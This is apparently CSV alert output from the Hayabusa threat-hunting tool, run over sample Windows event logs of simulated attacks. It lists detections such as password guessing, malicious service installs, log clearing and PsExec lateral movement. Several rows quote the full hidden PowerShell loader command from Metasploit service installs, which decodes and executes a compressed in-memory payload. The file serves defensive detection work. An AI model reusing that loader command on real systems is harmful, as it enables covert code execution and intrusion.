NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:36:09.147 
+09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:21.937 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
-2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:11:15.832 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx -2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx -2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx -2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx -2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
-2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 
+09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx -2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 